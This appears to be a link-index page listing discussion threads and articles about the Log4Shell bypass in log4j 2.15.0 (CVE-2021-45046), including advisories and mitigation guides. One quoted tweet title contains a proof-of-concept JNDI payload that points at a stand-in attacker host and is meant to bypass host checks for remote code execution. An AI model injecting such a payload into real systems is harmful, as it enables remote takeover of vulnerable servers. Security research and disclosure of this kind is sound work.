- Log4Shell Update: Full bypass found in log4j 2.15.0, enabling RCE again (CVSS score 3.7 -> 9.0) https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/ 144 comments programming
- Log4Shell Update: Full bypass found in log4j 2.15.0, enabling RCE again (with payload) https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/ 68 comments netsec
Linking pages
Linked pages
- Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package | LunaTrace https://www.lunasec.io/docs/blog/log4j-zero-day/ 1949 comments
- Log4j – Apache Log4j Security Vulnerabilities https://logging.apache.org/log4j/2.x/security.html 708 comments
- Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228 & CVE-2021-45046) | LunaTrace https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/ 12 comments
- Márcio Almeida on Twitter: "FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n" / Twitter https://twitter.com/marcioalm/status/1471740771581652995 1 comment
- Understanding Log4Shell via Exploitation and Live Patching (CVE-2021-44228 + CVE-2021-45046) | LunaTrace https://www.lunasec.io/docs/blog/log4shell-live-patch-technical/ 1 comment
- CVE - CVE-2021-44228 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 0 comments
- How to Automatically Mitigate Log4Shell via a Live Patch (CVE-2021-44228 + CVE-2021-45046) | LunaTrace https://www.lunasec.io/docs/blog/log4shell-live-patch/ 0 comments
Related searches:
Search whole site: site:lunasec.io
Search title: Log4Shell Update: Severity Upgraded 3.7 to 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaTrace
See how to search.